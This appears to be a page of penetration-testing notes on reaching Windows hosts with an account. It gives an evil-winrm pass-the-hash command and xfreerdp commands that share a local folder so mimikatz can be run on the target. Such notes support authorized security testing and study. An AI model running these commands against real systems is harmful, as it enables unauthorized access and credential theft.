connecting to windows environments with a user account

evil-winrm

  • Cmd line only

  • give a medium integrity shell

  • pass the hash using evil-winrm

    • evil-winrm -u Administrator -H <Hash> -i <ip>

freerdp2-x11

  • gui environment

  • can route audio, usb, pass trough hash attacks

  • xfreerdp /v:<ip> /u:user /p:'pass'

  • xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

    • with this shared mimikatz can be ran through cmd

    • \\tsclient\share\mimikatz\x64\mimikatz.exe

PrevioussshuttleNextpowershell empire

Last updated